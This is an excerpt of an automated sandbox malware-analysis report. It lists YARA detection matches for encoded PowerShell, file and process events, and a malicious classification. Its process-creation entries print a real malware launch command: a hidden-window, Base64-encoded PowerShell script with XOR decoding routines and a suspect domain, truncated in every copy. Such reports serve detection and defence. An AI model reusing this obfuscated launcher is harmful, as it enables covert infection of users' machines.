  • 0x267a:$xc1: 4A 41 42 32 41 43 41 41 50 51 41 67 41
  • 0x1c52:$xc3: 4A 41 42 73 41 44 30 41
  • 0x1dd2:$xc3: 4A 41 42 70 41 44 30 41
00000003.00000002.888152756.0000000000390000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
  • 0x3d14:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x3e44:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x29f4:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x2cf4:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000003.00000002.888245760.00000000005EB000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
  • 0x7b15:$xc1: 4A 41 42 32 41 43 41 41 50 51 41 67 41
  • 0x7bad:$xc1: 4A 41 42 32 41 43 41 41 50 51 41 67 41
  • 0x1a29c:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x1a3cc:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x7185:$xc3: 4A 41 42 73 41 44 30 41
  • 0x7305:$xc3: 4A 41 42 70 41 44 30 41
  • 0x18f7c:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x1927c:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000003.00000002.888181676.00000000003E0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
  • 0x3ec4:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x3ff4:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x6720:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x6850:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x2ba4:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x2ea4:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
  • 0x5400:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x5700:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000003.00000002.888226541.00000000005C0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
  • 0x882d:$xc1: 4A 41 42 32 41 43 41 41 50 51 41 67 41
  • 0x88c5:$xc1: 4A 41 42 32 41 43 41 41 50 51 41 67 41
  • 0x3224:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x3354:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x5a80:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x5bb0:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x7e9d:$xc3: 4A 41 42 73 41 44 30 41
  • 0x801d:$xc3: 4A 41 42 70 41 44 30 41
  • 0x1f04:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x2204:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
  • 0x4760:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x4a60:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
Click to see the 4 entries

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

System Summary

barindex
Very long command line found
Source: unknownProcess created: Commandline size = 5184
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 5176
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 5165
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 5176
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 5165
Source: 00000003.00000002.888389730.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888152756.0000000000390000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888245760.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888181676.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888226541.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888319048.0000000000629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888441908.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: Process Memory Space: powershell.exe PID: 1168, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 1168, type: MEMORYSTRMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_003CB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_003CB2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: classification engineClassification label: mal52.evad.win@5/2@0/0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................8.......H.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................8.......d.......................0...............X.'.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................8.......m.......................0...............X.'.............8.".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................8.......v.......................0....................... .......8.".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................8...............................0...............X.'.............................
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C "cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBl
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAF